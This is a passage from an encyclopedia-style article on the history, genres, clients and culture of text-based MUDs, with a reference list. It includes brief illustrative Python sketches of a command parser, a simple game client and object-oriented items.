In 1990, the release of DikuMUD, which was inspired by AberMUD, led to a virtual explosion of hack and slash MUDs based upon its code. DikuMUD inspired numerous derivative codebases , including CircleMUD , Merc , ROM , SMAUG , and GodWars . The original Diku team comprised Sebastian Hammer, Tom Madsen, Katja Nyboe, Michael Seifert, and Hans Henrik Staerfeldt. DikuMUD had a key influence on the early evolution of the MMORPG genre, with EverQuest (created by avid DikuMUD player Brad McQuaid [ 14 ] ) displaying such Diku-like gameplay that Verant developers were made to issue a sworn statement that no actual DikuMUD code was incorporated. [ 55 ] [ 56 ]

In 1987, David Whatley, having previously played Scepter of Goth and Island of Kesmai , founded Simutronics with Tom and Susan Zelinski. [ 57 ] In the same year they demonstrated a prototype of GemStone to GEnie . After a short-lived instance of GemStone II , GemStone III was officially launched in February 1990. GemStone III became available on AOL in September 1995, followed by the release of DragonRealms in February 1996. By the end of 1997 GemStone III and DragonRealms had become the first and second most played games on AOL. [ 58 ]

Game interface of Furcadia

The typical MUD will describe to the player the room or area they are standing in, listing the objects, players and non-player characters (NPCs) in the area, as well as all of the exits. To carry out a task the player would enter a text command such as take apple or attack dragon . Movement around the game environment is generally accomplished by entering the direction (or an abbreviation of it) in which the player wishes to move, for example typing north or just n would cause the player to exit the current area via the path to the north. [ 59 ]
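
As a minimal sketch of that command style, assuming an invented two-room world (none of the rooms, verbs, or abbreviations below come from any particular MUD), the verb-noun commands and single-letter movement abbreviations described above can be handled in a few lines:

    # Minimal illustration of MUD-style text commands and movement abbreviations.
    ROOMS = {
        "clearing": {"desc": "A grassy clearing. An apple lies here.",
                     "exits": {"north": "cave"}},
        "cave":     {"desc": "A damp cave. A dragon sleeps in the corner.",
                     "exits": {"south": "clearing"}},
    }
    ABBREV = {"n": "north", "s": "south", "e": "east", "w": "west"}

    def handle(room, line):
        words = line.strip().lower().split()
        if not words:
            return room, "Say again?"
        verb = ABBREV.get(words[0], words[0])
        if verb in ROOMS[room]["exits"]:                  # movement: "north" or "n"
            room = ROOMS[room]["exits"][verb]
            return room, ROOMS[room]["desc"]
        if verb == "look":
            return room, ROOMS[room]["desc"]
        if verb in ("take", "attack") and len(words) > 1: # e.g. "take apple"
            return room, f"You {verb} the {words[1]}."
        return room, "You can't do that here."

    room = "clearing"
    for cmd in ["look", "take apple", "n", "attack dragon"]:
        room, out = handle(room, cmd)
        print(f"> {cmd}\n{out}")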

MUD clients are computer applications that make the MUD telnet interface more accessible to users, [ 60 ] with features such as syntax highlighting , keyboard macros , and connection assistance. [ 61 ] [ 62 ] Prominent clients include TinyTalk, TinyFugue, TinTin++, and zMUD. [ 63 ] [ 64 ]
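
At bottom, a MUD client is a line-oriented TCP client with conveniences layered on top. A hedged sketch of that idea follows (the host, port, and highlight keyword are placeholders, and this is not the code of TinyTalk, TinyFugue, TinTin++, zMUD, or any real client):

    # Bare-bones line-based client sketch: one thread prints server output,
    # applying a simple highlight "trigger"; the main thread sends what you type.
    # Real clients also handle telnet option negotiation, which is ignored here.
    import socket, sys, threading

    HOST, PORT, HIGHLIGHT = "mud.example.org", 4000, b"dragon"   # placeholders

    def reader(sock):
        buf = b""
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    print("\n[disconnected]")
                    break
                buf += data
                while b"\n" in buf:
                    line, buf = buf.split(b"\n", 1)
                    if HIGHLIGHT in line:                    # crude trigger
                        line = b"\x1b[31m" + line + b"\x1b[0m"
                    sys.stdout.buffer.write(line + b"\n")
                    sys.stdout.flush()
        except OSError:
            pass

    with socket.create_connection((HOST, PORT)) as sock:
        threading.Thread(target=reader, args=(sock,), daemon=True).start()
        for line in sys.stdin:                               # send keyboard input
            sock.sendall(line.encode())

Features such as macros and keyboard scripting are, conceptually, just further transformations applied to these two streams of lines.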

While there have been many variations in overall focus, gameplay and features in MUDs, some distinct sub-groups have formed that can be used to help categorize different game mechanics , game genres and non-game uses.

Hack and slash MUDs

Perhaps the most common approach to game design in MUDs is to loosely emulate the structure of a Dungeons & Dragons campaign focused more on fighting and advancement than role-playing. When these MUDs restrict player-killing in favor of player versus environment conflict and questing , they are labeled hack and slash MUDs . This may be considered particularly appropriate since, due to the room-based nature of traditional MUDs, ranged combat is typically difficult to implement, resulting in most MUDs equipping characters mainly with close-combat weapons. This style of game was also historically referred to within the MUD genre as "adventure games", but video gaming as a whole has developed a meaning of " adventure game " that is greatly at odds with this usage.

Player versus player MUDs

Most MUDs restrict player-versus-player combat, often abbreviated as PK (Player Killing). This is accomplished through hard-coded restrictions and various forms of social intervention. MUDs without these restrictions are commonly known as PK MUDs . Taking this a step further are MUDs devoted solely to this sort of conflict, called pure PK MUDs, the first of which was Genocide in 1992. [ 65 ] Genocide's ideas were influential in the evolution of player-versus-player online gaming. [ 66 ]

Roleplaying MUDs , generally abbreviated as RP MUDs , encourage or require players to act out the role of their characters at all times. Some RP MUDs provide an immersive gaming environment, while others only provide a virtual world with no game elements. MUDs where roleplay is enforced and the game world is heavily computer-modeled are sometimes known as roleplay-intensive MUDs , or RPIMUDs . [ 67 ] In many cases, role-playing MUDs attempt to differentiate themselves from hack and slash types by dropping the "MUD" name entirely and instead using MUX (Multi-User Experience) or MUSH (Multi-User Shared Hallucination).

Social MUDs de-emphasize game elements in favor of an environment designed primarily for socializing. They are differentiated from talkers by retaining elements beyond online chat, typically online creation as a community activity and some element of role-playing . Often such MUDs have broadly defined contingents of socializers and roleplayers. Server software in the TinyMUD family , or MU* , is traditionally used to implement social MUDs.

A lesser-known MUD variant is the talker , a variety of online chat environment typically based on server software like ew-too or NUTS . Most of the early Internet talkers were LPMuds with the majority of the complex game machinery stripped away, leaving just the communication commands. The first Internet talker was Cat Chat in 1990.

Taking advantage of the flexibility of MUD server software, some MUDs are designed for educational purposes rather than gaming or chat. MicroMUSE is considered by author Lauren P. Burka to have been the first educational MUD, [ 68 ] but it can be argued [ weasel words ] that its evolution into this role was not complete until 1994, [ 69 ] which would make Diversity University (1993), the first of many educational MOOs , also the first educational MUD. The MUD medium lends itself naturally to constructionist learning pedagogical approaches. The Mud Institute (TMI) was an LPMud opened in February 1992 as a gathering place for people interested in developing LPMud and teaching LPC after it became clear that Lars Pensjö had lost interest in the project. TMI focused on both the LPMud driver and library, with the driver evolving into MudOS. The TMI Mudlib was never officially released, but was influential in the development of other libraries.

A graphical MUD is a MUD that uses computer graphics to represent parts of the virtual world and its visitors. [ 70 ] A prominent early graphical MUD was Habitat , written by Randy Farmer and Chip Morningstar for Lucasfilm in 1985. [ 71 ] Some graphical MUDs require players to download a special client and the game's artwork, while others are website-based and require no download. Graphical MUDs range from simply enhancing the user interface (e.g. Wolfery provides an option to set the room picture, but otherwise remains a text-based interaction) to simulating 3D worlds with visual spatial relationships and customized avatar appearances (e.g. Ultima Online provides a rich point-and-click experience).

Games such as Meridian 59 , EverQuest , Ultima Online and Dark Age of Camelot were routinely called graphical MUDs in their earlier years. [ 72 ] [ 73 ] [ 74 ] [ 75 ] RuneScape was originally intended to be a text-based MUD, but graphics were added very early in development. [ 76 ] [ 77 ] However, with the increase in computing power and Internet connectivity during the late 1990s, and the shift of online gaming to the mass market, the term "graphical MUD" fell out of favor, replaced by MMORPG ( massively multiplayer online role-playing game ), a term coined by Richard Garriott in 1997. [ 78 ]

Within a MUD's technical infrastructure, a mudlib (short for "MUD library") [ 79 ] [ 80 ] defines the rules of the in-game world. [ 81 ] Examples of mudlibs include Ain Soph Mudlib , CDlib , [ 82 ] Discworld Mudlib , Lima Mudlib , [ 83 ] LPUniversity Mudlib , MorgenGrauen Mudlib , Nightmare Mudlib , and TMI Mudlib .

MUDs built with object-oriented programming can support complex features that MUDs without it cannot, such as letting users add new elements to the game world and giving them more ways to interact with it. [ 3 ]
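
A hedged sketch of what that object-oriented extensibility looks like, using invented classes rather than any real codebase's API: a new kind of world element is added purely by subclassing, and existing code written against the base class keeps working on it.

    # Illustration of OO extensibility in a MUD-like world model (invented API).
    class Item:
        def __init__(self, name):
            self.name = name
        def examine(self):
            return f"An unremarkable {self.name}."

    class Lamp(Item):                      # new element added by subclassing
        def __init__(self):
            super().__init__("lamp")
            self.lit = False
        def examine(self):
            return "A brass lamp, " + ("glowing softly." if self.lit else "unlit.")
        def light(self):                   # new interaction the base class lacks
            self.lit = True
            return "The lamp flares to life."

    inventory = [Item("rock"), Lamp()]
    for thing in inventory:                # existing 'examine' code needs no changes
        print(thing.examine())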

MUD history has been preserved primarily through community sites and blogs rather than through mainstream sources of journalistic repute. [ 84 ] Since the late 1990s, a website called The Mud Connector has served as a central, curated repository of active MUDs. [ 85 ] [ 86 ] [ 87 ] In 1995, The Independent reported that over 60,000 people regularly played about 600 MUDs, up from 170 MUDs three years earlier. The Independent also noted distinct patterns of socialization within MUD communities. [ 88 ]

In 2004, MUDs were relatively popular in the United States and mostly text-based. [ 3 ]

Seraphina Brennan of Massively wrote that the MUD community was "in decline" as of 2009. [ 84 ]

Psychology and engagement

Sherry Turkle developed a theory that the constant use (and in many cases, overuse) of MUDs allows users to develop different personalities in their environments. She uses examples, dating back to the text-based MUDs of the mid-1990s, showing college students who simultaneously live different lives through characters in separate MUDs, up to three at a time, all while doing schoolwork. The students claimed that it was a way to "shut off" their own lives for a while and become part of another reality. Turkle claims that this could present a psychological problem of identity for today's youths. [ 8 ]

" A Story About A Tree " is a short essay written by Raph Koster regarding the death of a LegendMUD player named Karyn, raising the subject of inter-human relationships in virtual worlds.

Observations of MUD-play show styles of play that can be roughly categorized. Achievers focus on concrete measurements of success such as experience points, levels , and wealth; Explorers investigate every nook and cranny of the game, and evaluate different game mechanical options; Socializers devote most of their energy to interacting with other players; and then there are Killers who focus on interacting negatively with other players, if permitted, killing the other characters or otherwise thwarting their play. Few players play only one way; most exhibit a diverse style. [ 89 ] According to Richard Bartle , "People go there as part of a hero's journey—a means of self-discovery". [ 90 ]

Research has suggested that various factors combine in MUDs to provide users with a sense of presence rather than simply communication. [ 91 ]

Grammatical usage and derived terms

As a noun, the word MUD is variously written MUD, Mud, and mud, depending on speaker and context. It is also used as a verb, with to mud meaning to play or interact with a MUD and mudding referring to the act of doing so. [ 92 ] A mudder is one who MUDs. [ 93 ] Compound words and portmanteaux such as mudlist , mudsex , and mudflation [ 94 ] are also regularly coined. Puns on the "wet dirt" meaning of "mud" are endemic, as with, for example, the names of the ROM (Rivers of MUD), MUCK , MUSH , and CoffeeMUD codebases and the MUD Muddy Waters .

  1. ^ a b c Bartle 2003 , pp. 9–10, 741, [pp. 9-10] " TinyMUD was deliberately intended to be distanced from the prevailing hack-and-slay AberMUD style, and the 'D' in its name was said to stand for 'Dimension' (or, occasionally, 'Domain') rather than 'Dungeon;' this is the ultimate cause of the MUD/MU* distinction that was to arise some years later." [pp. 741] "The 'D' in MUD stands for 'Dungeon' [...] because the version of ZORK Roy played was a Fortran port called DUNGEN."
  2. ^ a b Hahn, Harley (1996). The Internet Complete Reference (2nd ed.). Osborne McGraw-Hill. pp. 553 . ISBN 978-0-07-882138-7 . [...] muds had evolved to the point where the original name was too confining, and people started to say that "MUD" stood for the more generic "Multi-User Dimension" or "Multi-User Domain".
  3. ^ a b c d Salamone, Frank A. (2004). Levinson, David (ed.). Encyclopedia of Religious Rites, Rituals, and Festivals . New York: Routledge . p. 300. ISBN 0-415-94180-6 .
  4. ^ Hansen, Geir Harald (July 31, 2002). A Distributed Persistent World Server using Dworkin's Generic Driver (PDF) (Cand. Scient. thesis). University of Oslo. Archived (PDF) from the original on May 13, 2011 . Retrieved April 14, 2010 .
  5. ^ Boring, Erich (December 3, 1993). PangaeaMud: An Online, Object-oriented Multiple User Interactive Geologic Database Tool (PDF) (Master's thesis). Miami University. Archived (PDF) from the original on July 20, 2011 . Retrieved May 3, 2010 .
  6. ^ Cruickshank, Don; De Roure, David (2004). "A Portal for Interacting with Context-aware Ubiquitous Systems" . Proceedings of First International Workshop on Advanced Context Modelling, Reasoning and Management : 96– 100. CiteSeerX 10.1.1.1.8402 . Archived from the original on November 21, 2010 . Retrieved October 14, 2010 .
  7. ^ Schaefer, Dominik; Mardare, Cezarina; Savan, Alan; Sanchez, Miguel D.; Mei, Bastian; Xia, Wei; Muhler, Martin; Ludwig, Alfred; Schuhmann, Wolfgang (February 17, 2011). "High-Throughput Characterization of Pt Supported on Thin Film Oxide Material Libraries Applied in the Oxygen Reduction Reaction". Analytical Chemistry . 83 (6): 1916– 1923. doi : 10.1021/ac102303u . hdl : 11336/105712 . PMID 21329337 . Programs in LPC programming language were developed to perform the following tasks: First, each set of CVs was separated into single CVs, and each of them were plotted. An average CV from all the CVs in one set was calculated and plotted as well. All images belonging to one set of CVs were combined into short animated movies to visualize the changes over time. The graphs of the averaged CVs from all measurement points within a line scan were combined into an animation for demonstrating the systematic changes along each of the Pt stripes. After that, specific parameters were extracted from each CV (see below). These parameters and some derived values were tabulated and plotted versus the x-coordinate of the measurement point. Thus, different graphs for each line scan were created showing the changes in specific properties along the thickness of the Pt stripe. The combined tabulated data for each wafer was then used to plot a 3D image of several parameters vs substrate composition and nominal thickness. The LPC programs were compiled using LDMud (V3.3.719).
  8. ^ a b Turkle, Sherry (September 4, 1997). Life on the Screen: Identity in the Age of the Internet (pbk. ed.). Simon & Schuster . ISBN 978-0-684-83348-4 .
  9. ^ Grimmelmann, James (December 8, 2004). "Virtual Worlds as Comparative Law" (PDF) . New York Law School Law Review (49): 147– 184. Archived from the original (PDF) on June 19, 2010 . Retrieved May 6, 2010 .
  10. ^ a b Castronova, Edward (2006). Synthetic Worlds: The Business and Culture of Online Games . University Of Chicago Press. pp. 10, 291 . ISBN 978-0-226-09627-8 . [pp. 10] The ancestors of MMORPGS were text-based multiuser domains (MUDs) [...] [pp. 291] Indeed, MUDs generate perhaps the one historical connection between game-based VR and the traditional program [...]
  11. ^ Shefski, William J. (1995). Interactive Internet: The Insider's Guide to MUDs, MOOs, and IRC . Prima Publishing . pp. 41 . ISBN 978-1-55958-748-8 .
  12. ^ Stuart, Keith (July 19, 2007). "MUD, PLATO and the dawn of MMORPGs" . The Guardian . London. The thing is, though, that even if the likes of Oubliette did count as a virtual world, they had pretty well zero effect on the development of today's virtual worlds. Follow the audit trail back from World of Warcraft, and you wind up at MUD.
  13. ^ Taylor, T.L. (February 24, 2006). Play Between Worlds: Exploring Online Game Culture . The MIT Press. pp. 24 . ISBN 978-0262201636 .
  14. ^ a b Nelson, Mike (July 2, 2002). "Interview: Brad McQuaid" . The guru of 3D . Archived from the original on March 10, 2007 . Retrieved March 3, 2007 .
  15. ^ Carter, Randolph (April 23, 2009). "Psychochild" . Grinding to Valhalla . Retrieved April 19, 2010 . The MUDs I played extensively: Genocide (where I first used the name "Psychochild"), Highlands, Farside, Kerovnia, and Astaria.
  16. ^ Montfort, Nick (2003). Twisty Little Passages: An Approach to Interactive Fiction . MIT Press . ISBN 978-3-540-63293-1 .
  17. ^ Stewart, William. "Summary MUD History" . Living Internet . Archived from the original on July 25, 2008 . Retrieved July 10, 2008 . Containing many of the features of a D&D game, it added an interesting twist -- the dungeon master, the person who set-up and ran a D&D world, was played by the Adventure computer program itself.
  18. ^ Brian Dear, Chapter 16: "Into the Dungeon", The Friendly Orange Glow , Pantheon Books, New York, 2017; see pages 292–294 for "pedit5", pages 294–297 for "dnd", pages 297–298 for "dungeon".
  19. ^ Anderson, Tim ; Galley, Stu . "The History of Zork" . Archived from the original on January 16, 2009. Zork was too much of a nonsense word, not descriptive of the game, etc., etc., etc. Silly as it sounds, we eventually started calling it Dungeon. (Dave admits to suggesting the new name, but that's only a minor sin.) When Bob the lunatic released his FORTRAN version to the DEC users' group, that was the name he used.
  20. ^ Kelly, Kevin ; Rheingold, Howard (1993). "The Dragon Ate My Homework" . Wired . Vol. 1, no. 3. Archived from the original on October 25, 2012 . Retrieved March 8, 2017 . In 1980, Roy Traubshaw, a British fan of the fantasy role-playing board game Dungeons and Dragons, wrote an electronic version of that game during his final undergraduate year at Essex College. The following year, his classmate Richard Bartle took over the game, expanding the number of potential players and their options for action. He called the game MUD (for Multi-User Dungeons), and put it onto the Internet.
  21. ^ Bartle, Richard (1990). "Early MUD History" . Archived from the original on March 24, 2023 . Retrieved August 7, 2008 . The program was also becoming unmanageable, as it was written in assembler. Hence, he rewrote everything in BCPL, starting late 1979 and working up to about Easter 1980. The finished product was the heart of the system which many people came to believe was the "original" MUD. In fact, it was version 3.
  22. ^ Shah & Romine 1995 , p. 7, "The acknowledged original game known as 'MUD' was developed in 1978 for the old DEC-10 mainframe system at Essex University by Roy Trubshaw and Richard Bartle."
  23. ^ Cuciz, D. (2004). "The History of MUDs" . GameSpy.com. Archived from the original on March 24, 2008 . Retrieved April 19, 2009 .
  24. ^ Wisner, Bill (June 29, 1990). "A brief history of MUDs" . alt.mud . Archived from the original on April 24, 2010 . Retrieved January 8, 2009 . The point of the game was to gain points until you achieved the rank of wizard, at which point you became immortal and gained certain powers over mortals. Points were scored by killing things or dropping treasure into a swamp. The game gained some popularity in Britain when a guest account was set up that allowed users on JANET (the British academic network) to play during the small hours of the morning each day.
  25. ^ Hosch, William L.; Ray, Michael (May 9, 2023). "Online gaming" . Encyclopedia Britannica . Retrieved May 19, 2023 .
  26. ^ Mulligan, Jessica; Patrovsky, Bridgette (2003). Developing Online Games: An Insider's Guide . New Riders. pp. 444 . ISBN 978-1-59273-000-1 . 1980 [...] Final version of MUD1 completed by Richard Bartle. Essex goes on the ARPANet, resulting in Internet MUDs!
  27. ^ Bartle, Richard . "Incarnations of MUD" . This is the "classic" MUD, played by many people both internal and external to the University. Although eventually available only during night-time due to the effects of its popularity on the system, its impact on on-line gaming has been immense. I eventually closed it down on 30/9/87 upon leaving Essex University to work for MUSE full time.
  28. ^ Lawrie, Michael (2003). "Escape from the Dungeon" . October of 1987 was chaos. The MUD account was deleted, but the guest account on Essex University remained open. I guess it wasn't causing any trouble so they simply left it. ROCK, UNI and MUD all ran from the MUD account so they had gone but... MIST ran from a student account and it was still playable.
  29. ^ Bartle, Richard (1990). "Interactive Multi-User Computer Games" . Archived from the original on February 2, 2016. Although the present system went live in October 1988, Gods began in 1985 as a non-commercial MUA; its author was inspired by MUD1 to write his own game, and was among the first people to do so. Gods was Shades' only rival to be the Prestel Micronet MUA.
  30. ^ Bartle, Richard (1990). "Interactive Multi-User Computer Games" . Archived from the original on February 2, 2016. Pip Cordrey used to run a BBS called 'Labbs', which had a section devoted to MUD1 in its early days. Six people from St. Paul's School worked on that section, and Cordrey organised them into a team to develop a MUA that would run on a home computer. The system was named MirrorWorld because it had rolling resets (as in the film "Westworld"). It went live in 1986.
  31. ^ Kate & Frobozz (1986). "Micronet's Multi-user Game" . Commodore Computing International . Archived from the original on April 30, 2009 . Retrieved January 8, 2009 . Written by Neil Newell, originally as a hobby because he enjoyed playing- the original MUD so much on Essex University, SHADES has recently. been launched on Micronet, the computer network, which has a large Commodore user-base.
  32. ^ Sinha, Indra (1999). The Cybergypsies: a True Tale of Lust, War, and Betrayal on the Electronic Frontier . Viking Press . ISBN 978-0-670-88630-2 .
  33. ^ Bartle, Richard (1990). "Interactive Multi-User Computer Games" . Archived from the original on February 2, 2016. The Multi-User Galaxy Game project was begun in 1985 by CompuNet as a SF alternative to MUD1, which then ran on the system. When the other programmer left CompuNet, Lenton rewrote the game from scratch as Federation II . It was officially launched on CompuNet in 1989; reported also to run on MicroLink, and on any other commercial system willing to take it.
  34. ^ Wisner, Bill (June 29, 1990). "A brief (and very incomplete) history of MUDs" . alt.mud . Archived from the original on November 9, 2012 . Retrieved August 7, 2008 . Milieu was originally written for a CDC Cyber owned by the Minnesota Educational Computer Consortium. High school students from around the state were given access to the machine for educational purposes; they often ended up writing chat programs and games instead. I am uncertain of the precise time frame, but I believe Milieu probably predates MUD.
  35. ^ Bartle, Richard (2016). MMOs from the Inside Out . Apress. p. 31. ISBN 978-1-4842-1724-5 . in 1983, Klietz formed a company, GāmBit, with Bob Alberti and two others to commercialize Sceptre.
  36. ^ Klietz, Alan (January 20, 1992). "Scepter - the first MUD?" . Archived from the original on December 7, 2008 . Retrieved April 26, 2010 . As micros became cost effective, the MECC mainframe became obsolete and was shut down in 1983. Scepter then went commercial in a collaboration between several ex-MECC (and by then also post-highschool) game hackers. It was rewritten in C and ran on a PC XT running QNX. It supported 16 dialup users, and dialup installations were set up in 5 states and Canada. This exposed Scepter to a lot of budding MUD developers at a time when the Internet was just getting started.
  37. ^ Bartle 2003 , p. 13, "Around the same time that Roy Trubshaw began work on what was to become MUD1, Alan Klietz wrote Sceptre of Goth on the CDC Cyber run by MECC (the Minnesota Educational Computer Consortium)."
  38. ^ Hyrup, Darrin (February 10, 2007). "The Future of Dragon's Gate" . Archived from the original on July 18, 2011 . Retrieved April 26, 2010 . So after more than 15 years of great memories, with a heavy heart, I am going to officially declare Dragon's Gate closed... at least for now.
  39. ^ Mulligan, Jessica; Patrovsky, Bridgette (2003). Developing Online Games: An Insider's Guide . New Riders. pp. 447 , 463. ISBN 978-1-59273-000-1 . 1985 [...] "My memory says that Island of Kesmai went live on CompuServe on December 15, 1985, after a very long internal test. The price was actually $6 an hour for 300 baud, $12 for 1200 baud. Serious players paid the bucks." Kelton Flinn [...] 2000 [...] In May, Electronics Arts announces the shutdown of most of the Kesmai games, including Legends of Kesmai and Air Warrior Classic.
  40. ^ "A Study of MUDs as a Society" . 1998. Some would insist however that 'MUD' does in fact stand for Multi Undergraduate Destroyer, in recognition of the number of students who may have failed their classes due to too much time spent MUDding!
  41. ^ Bartle, Richard. "Richard A. Bartle: Reviews - UK" . Archived from the original on December 28, 2015 . Retrieved June 7, 2015 . When you leave the game, objects can be kept for when you restart (eg. that weapon you commissioned from a smith), and you restart in the room from which you quit. This means some objects can be kept unavailable for long periods if their owner isn't playing. There are no resets.
  42. ^ Bartle, Richard. "Reviews – UK" . www.mud.co.uk . Archived from the original on December 28, 2015 . Retrieved June 7, 2015 . Experience is obtained by visiting new places, wandering around exploring, and even by simply chatting. This contrasts with the usual MUA scheme where points are obtained for finding treasure or performing specific tasks.
  43. ^ Bartle, Richard. "Reviews – UK" . www.mud.co.uk . Archived from the original on December 28, 2015 . Retrieved June 7, 2015 . Almost anything can be bought, including houses, shops, taverns, animals, weapons, food and drink. Personae may use certain skills to create objects, eg. potions, which can be sold to other players for use on their adventures.
  44. ^ Carroll, Eddy. "5. Reviews -- Rest of the World" . Archived from the original on April 23, 2010 . Retrieved September 25, 2002 . Cox was a player of MUD1 who wrote AberMUD while a student at the University of Wales, Aberystwyth.
  45. ^ Bartle 2003 , p. 741, "AberMUD spread across university computer science departments like a virus. Identical copies (or incarnations) appeared on thousands of Unix machines. It went through four versions in rapid succession, spawning several imitators. The three most important of these were TinyMUD, LPMUD, and DikuMUD."
  46. ^ Skrenta, Richard (November 30, 1988). "monster - multiuser adventure game for VMS" . comp.sources.games . Retrieved April 26, 2010 . Monster was written in VMS Pascal under VMS 4.6.
  47. ^ Skrenta, Richard (January 20, 2002). "VMS Monster" . Skrentablog . Archived from the original on February 2, 2006 . Retrieved November 1, 2010 .
  48. ^ Skrenta, Richard (January 13, 1997). "An Introduction to Monster" . Retrieved April 26, 2010 . Monster allows players to do something that very few, if any, other games allow: the players themselves create the fantasy world as part of the game. Players can create objects, make locations, and set up puzzles for other players to solve.
  49. ^ Aspnes, James (July 4, 1990). "Monster" . alt.mud . TinyMUD 1.0 was initially designed as a portable, stripped-down version of Monster (this was back in the days when TinyMUD was designed to be up and running in a week of coding and last for a month before everybody got bored of it.)
  50. ^ Burka, Lauren P. (1995). "The MUDline" . Archived from the original on January 2, 2005 . Retrieved April 26, 2010 . August 19, 1989. Jim Aspnes announces the availability of TinyMUD to a few friends. Its port, 4201, is Aspnes' office number. TinyMUD is written in C for Unix, and was originally conceived as a front-end for IRC.
  51. ^ "toccobrator.com: TinyMUD Classic" .
  52. ^ Bartle, Richard. "Adventure 89 review Pip Cordrey" .
  53. ^ Mulligan, Jessica; Patrovsky, Bridgette (2003). Developing Online Games: An Insider's Guide . New Riders. pp. 451 . ISBN 978-1-59273-000-1 . 1989 [...] Lars Penjske creates LPMud and opens Genesis . "Having fun playing TinyMUD and AberMUD , Lars Penjske decides to write a server to combine the extensibility of TinyMUD with the adventures of AberMUD . Out of this inspiration, he designed LPC as a special MUD language to make extending the game simple. Lars says, '...I didn't think I would be able to design a good adventure. By allowing wizards coding rights, I thought others could help me with this.' The first running code was developed in a week on Unix System V using IPC, not BSD sockets. Early object-oriented features only existed accidentally by way of the nature of MUDs manipulating objects. As Lars learned C++, he gradually extended those features. The result is that the whole LPMud was developed from a small prototype, gradually extended with features." — George Reese's LPMud Timeline
  54. ^ Stewart, William (2002). "MUD History" . The original LPMUD was written by Lars Pensjö and others, and became one of the most popular MUD's by the early 1990s.
  55. ^ Smedley, John ; McQuaid, Brad (March 17, 2000). "Sworn Statement" . DIKU MUD. Archived from the original on April 13, 2011 . Retrieved April 26, 2010 .
  56. ^ McQuaid, Brad ; Clover, Steve; Uzun, Roger (March 17, 2000). "Sworn Statement" . DIKU MUD. Archived from the original on April 13, 2011 . Retrieved April 26, 2010 .
  57. ^ Cambron, Melanie (2002). "A chat with Elonka Dunin" . Archived from the original on September 27, 2007. Simutronics was originally the brain-child of David Whatley. As a teenager, he'd been big into the old BBS days and had even written some Fantasy Game BBS software that he sold all over the world, and he did this all from his parents' home. He'd also gotten involved as a player in some of the early multiplayer games that were out there such as Sceptre and Island of Kesmai, and, like many others who play these games, he thought to himself, "I can do this too." So in 1987, at the age of 21, he founded Simutronics Corporation with Tom and Susan Zelinski.
  58. ^ Dunin, Elonka (2008). "Simutronics Timeline" . Archived from the original on October 7, 2008 . Retrieved January 15, 2009 . December, 1996 - GemStone III and DragonRealms are the top two titles (hours/month) in industry
  59. ^ Basic movement commands: The Lands of Evermore Manual Archived 2013-04-20 at the Wayback Machine
  60. ^ Levine, John R. (1997). More Internet for Dummies . IDG Books. p. 199. ISBN 0-7645-0135-6 . A better way to connect to a MUD is by using a MUD client program: a program specifically designed for MUDding. A MUD program is really a telnet program that has had various MUD-related commands added.
  61. ^ Shah & Romine 1995 , p. 257, "Features include regular expression hilites and gags, auto-login, macros, line editing, screen mode, triggers, cyberportals, logging, file and command uploading, shells, and multiple connects."
  62. ^ Busey 1995 , p. 200, "The TinyFugue system has long been a popular client interface for players of MOO, MUCK, and many TinyMUD-derivative systems. With a robust feature list supporting multiple sessions, macros, triggers and automation, command history and other functions, TinyFugue offers users maximum control over their environment. Although more recent programs such as Tintin++ have gained large followings, many MUD players continue to use TinyFugue because of its power and flexibility in the hands of an experience client programmer."
  63. ^ Cheong 1996 , p. 256 .
  64. ^ Bartle 2003 , p. 481.
  65. ^ Reese, George (March 11, 1996). "LPMud Timeline" . Archived from the original on February 26, 2012 . Retrieved April 14, 2010 . January 1992 ¶ _Genocide_ starts as the first MUD dedicated totally to inter-player conflict, which is a fancy way of saying that its theme is creatively player-killing.
  66. ^ Shah & Romine 1995 , pp. 98–99, "Some Muds are completely dependant on player-killing, and have wars that start every half-hour or so. These Muds are becoming more common, basing a lot of their ideas on the extremely popular LPmud known as Genocide."
  67. ^ Korchmar, Simon (2007). Erlösmodelle in Massively Multiplayer online Games [ Revenue Models in Massively Multiplayer online Games ] (in German). GRIN Verlag . p. 10. ISBN 978-3-640-22276-6 . Unzählige MUD-Nachfolger (wie etwa MOO, MUSH, MUCK, etc.) verwendeten ähnliche Systeme und Thematiken — v. A. aus Fantasy und Science Fiction — und verstärkten teilweise den Rollenspiel-Charakter bis hin zu den 'sogennanten Role Play Intensive MUD (RPIMUD)'. ["Countless MUD successors (such as MOO, MUSH, MUCK, etc.) used similar systems and themes from fantasy and science fiction, and increased degrees of role-playing focus up to the so-called 'Role Play Intensive MUD (RPIMUD)'"]
  68. ^ Burka, Lauren P. (1995). "The MUD Timeline" . Archived from the original on January 2, 2005 . Retrieved April 22, 2010 . Summer 1991. koosh (Nils McCarty) ports MicroMush to Chezmoto. The name is changed to MicroMuse at the suggestion of Wallace Feurzeig of BBN. MicroMuse evolves into the first educational Mud, with emphasis on K12 outreach.
  69. ^ "MicroMUSE Charter" . MuseNet. 1994. Archived from the original on June 15, 2011 . Retrieved April 22, 2010 .
  70. ^ Bartle 2003 , p. 3, "Confusingly, although the term MUD applies to virtual worlds in general, the term MU* does not—it's used strictly for text-based worlds. The introduction of computer graphics into the mix therefore caused a second spate of naming, in order to make a distinction between graphical MUDs and text MUDs ."
  71. ^ Castronova, Edward (2006). Synthetic Worlds: The Business and Culture of Online Games . University Of Chicago Press. pp. 291 . ISBN 978-0-226-09627-8 . [...] established Habitat as a result. This is described as a 2D graphical MUD, and while we now know that Habitat was the first of many massively multiuser graphical chat spaces, we also know that the connection is not direct. [...] Its owners and makers (particularly F. Randy Farmer and Chip Morningstar) [...]
  72. ^ Damer, Bruce (1998). Avatars!: exploring and building virtual worlds on the Internet . Peachpit Press. pp. 383–384 . ISBN 978-0-201-68840-5 . Some people describe it as a MUD (Multi User Dungeon) with a 3D interface and role playing character.
  73. ^ Aihoshi, Richard (September 27, 2000). "Brad McQuaid Interview" . RPG Vault. Archived from the original on May 24, 2007. Then, in 1996, I was hired by Sony Interactive Studios to create a graphical, commercial MUD.
  74. ^ Firor, Matt (2003). "Post-Mortem: Mythic's Dark Age of Camelot ". In Mulligan, Jessica; Patrovsky, Bridgette (eds.). Developing Online Games: An Insider's Guide . New Riders. pp. 340 . ISBN 978-1-59273-000-1 . It made perfect sense for us to combine the two technologies and make a graphical MUD.
  75. ^ King, Brad (July 15, 2002). "Games Started Off Without a Bang" . Wired News . Retrieved September 9, 2010 .
